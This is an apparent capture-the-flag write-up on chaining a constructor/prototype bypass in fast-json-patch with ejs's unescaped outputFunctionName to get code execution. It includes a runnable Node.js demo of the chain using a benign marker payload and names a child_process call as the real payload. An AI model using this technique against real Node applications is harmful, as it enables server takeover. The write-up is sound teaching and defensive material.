tl;dr
- Use a prototype pollution vulnerability in fast-json-patch to pollute outputFunctionName, which ejs copies into the compiled template code
- Get a shell, since the flag can only be obtained by running a binary on the server
No. Of Solves: 78
Challenge points: 151
Solved By: 1nt3rc3pt0r, Captain-Kay
Challenge Description
Laura just found a website used for monitoring security mechanisms on Rhiza’s state and is planning to hack into it to forge the status of these security services. After that she will deactivate these security resources without alerting government agents. Your goal is to get into the server to change the monitoring service behavior.
Source Code: here
Analysis
We have a list of services and their statuses in index.js:

```javascript
let services = {
```
The endpoint /change_status is used to update the status of services. This is done with the fast-json-patch package, which applies a JSON Patch (RFC 6902) document to the services object:

```javascript
app.post("/change_status", (req, res) => {
```
fast-json-patch previously had a prototype pollution vulnerability, which is reported as fixed in the version used in the challenge. The fix is the banPrototypeModifications check:

```javascript
if (banPrototypeModifications && key == '__proto__') {
```

The patch is not good enough to prevent prototype pollution: it only checks whether a path segment is __proto__. Object.prototype can still be reached through the constructor/prototype path, because constructor on any plain object resolves to Object, whose prototype property is Object.prototype.
Check Here
Solution
Now we can overwrite any value we need with a patch path of the form constructor/prototype/<variable>. The property is set on Object.prototype, so every object that does not define it itself inherits the injected value.
RCE using Prototype pollution
The app uses ejs as its template engine. When compiling a template, ejs.js concatenates opts.outputFunctionName unescaped into the source of the generated render function (it emits a line of the form var <outputFunctionName> = __append;), so a polluted outputFunctionName lets us inject arbitrary JavaScript and leads to RCE. Check Here

```javascript
if (opts.outputFunctionName) {
```
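As an added example (my own toy code, not the challenge's source and not the actual implementation of fast-json-patch or ejs), the following Node.js script reproduces the whole chain from the Solution and RCE sections end to end: a JSON-Patch add that carries the __proto__-only guard described above, the constructor/prototype bypass, and an ejs-style compile step that splices outputFunctionName into generated function source. The services document, the PAYLOAD string and the hardened option are assumptions made for the demo, and the payload is a benign marker rather than a child_process call.

```javascript
// Added example, not code from the challenge, fast-json-patch or ejs: a toy
// JSON-Patch "add" carrying the __proto__-only guard the text describes, plus
// a toy ejs-style compile step, to show the whole chain end to end.

// Toy JSON-Patch "add"/"replace": walk the JSON-Pointer path, assign the value.
// `hardened: true` additionally refuses the constructor/prototype path.
function applyOp(doc, op, { banPrototype = true, hardened = false } = {}) {
  if (op.op !== 'add' && op.op !== 'replace') throw new Error('toy: only add/replace');
  const keys = op.path.split('/').slice(1)
    .map(k => k.replace(/~1/g, '/').replace(/~0/g, '~'));   // RFC 6901 unescape
  let obj = doc;
  for (let i = 0; i < keys.length; i++) {
    const key = keys[i];
    if (banPrototype) {
      if (key === '__proto__') throw new TypeError('banned: __proto__');
      if (hardened && key === 'prototype' && keys[i - 1] === 'constructor') {
        throw new TypeError('banned: constructor/prototype');
      }
    }
    if (i === keys.length - 1) obj[key] = op.value;
    else obj = obj[key];   // plain property walk: "constructor" yields Object itself
  }
  return doc;
}

// Toy ejs-style compile: as in ejs.compile(), opts.outputFunctionName is
// concatenated unescaped into the source of the generated render function.
function toyCompile(template, opts = {}) {
  let src = 'var __output = "";\n' +
            'function __append(s) { if (s != null) __output += s; }\n';
  if (opts.outputFunctionName) {
    src += '  var ' + opts.outputFunctionName + ' = __append;\n';
  }
  src += '__append(' + JSON.stringify(template) + ');\n';
  src += 'return __output;';
  return new Function('locals', src);
}

// Benign stand-in for the real payload (which would do something like
// process.mainModule.require('child_process').execSync('...')): it only
// marks `locals` so we can observe that the injected statement executed.
const PAYLOAD = 'x = __append; locals.pwned = "injected code ran"; //';

function runChain() {
  const services = { firewall: { status: 'up' } };   // constructed sample document
  const result = {};

  // 1. The original guard catches the obvious path...
  try {
    applyOp(services, { op: 'add', path: '/__proto__/outputFunctionName', value: PAYLOAD });
    result.protoBlocked = false;
  } catch (e) { result.protoBlocked = e instanceof TypeError; }

  // 2. ...but /constructor/prototype/<key> walks services -> Object -> Object.prototype.
  // This object is the JSON body shape you would POST to /change_status.
  applyOp(services, { op: 'add', path: '/constructor/prototype/outputFunctionName', value: PAYLOAD });
  result.polluted = ({}).outputFunctionName === PAYLOAD;

  // 3. Any later compile with default options inherits the polluted property.
  const locals = {};
  result.rendered = toyCompile('status page', {})(locals);
  result.pwned = locals.pwned;

  // 4. The same path is refused once the guard also covers constructor/prototype.
  try {
    applyOp({}, { op: 'add', path: '/constructor/prototype/zzz', value: 1 }, { hardened: true });
    result.hardenedBlocked = false;
  } catch (e) { result.hardenedBlocked = e instanceof TypeError; }

  delete Object.prototype.outputFunctionName;   // undo the pollution
  return result;
}

console.log(runChain());
```

Run it with node. The trailing // in the payload swallows the " = __append;" that ejs appends after the name, which is why the generated source stays syntactically valid; in the real exploit the marker assignment is replaced by a child_process call.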
Exploit Script
```python
import requests
```
Flag
CTF-BR{d0nt_miX_pr0totyPe_pol1ution_w1th_a_t3mplat3_3ng1nE!}